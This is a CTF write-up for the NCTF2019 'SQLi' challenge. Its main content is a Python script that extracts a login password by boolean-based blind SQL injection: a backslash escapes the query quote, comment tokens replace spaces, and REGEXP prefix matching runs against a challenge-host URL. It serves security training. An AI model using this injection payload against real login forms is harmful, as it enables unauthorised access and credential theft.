[NCTF2019]SQLi
- robots.txt有个hint.txt
- hint.txt说只要密码对就给flag
- 利用 MySQL 的正则表达式运算符 REGEXP：根据登录是否成功（布尔盲注）逐位匹配出密码
import requests
import string
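# Boolean-based blind recovery of the `passwd` value for the NCTF2019 "SQLi"
# challenge: each request asks whether the stored password matches the regex
# "^<known prefix><candidate>", and the "welcome" marker in the response is
# the yes/no answer.

# Challenge instance that serves the login form.
url = "http://5f80822e-bbf0-4050-ba1b-6fc9c1783ad4.node3.buuoj.cn/"
# Candidate characters tried at every position, in this order.
str_list = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_"
# Prefix of the password confirmed so far.
password = ""

while True:
    for j in str_list:
        data = {
            # A single backslash. The page printed this literal as "\", which
            # is not valid Python. Presumably the backslash escapes the quote
            # that closes the username literal in a string-concatenated
            # server-side query -- the root cause that a parameterised query
            # removes. TODO confirm against the challenge source.
            "username": "\\",
            # /*n*/ comments sit where spaces would normally go (presumably
            # the input filter rejects whitespace), and chr(0) appends a NUL
            # byte after the ';'.
            "passwd": '||/*1*/passwd/*2*/regexp/*3*/"^%s";%s' % (password + j, chr(0)),
        }
        # The timeout keeps one stalled request from hanging the whole run.
        r = requests.post(url, data=data, timeout=10)
        if "welcome" in r.text:
            password += j
            print(password)
            break
    else:
        # No candidate extended the prefix: the password is complete, or its
        # next character is outside str_list. Without this exit the original
        # loop re-sent the full alphabet forever.
        break

# NOTE(review): MySQL REGEXP is case-insensitive for non-binary strings, and
# lowercase letters are tried first, so the letter case of the printed value
# is not reliable unless the column uses a binary or case-sensitive collation.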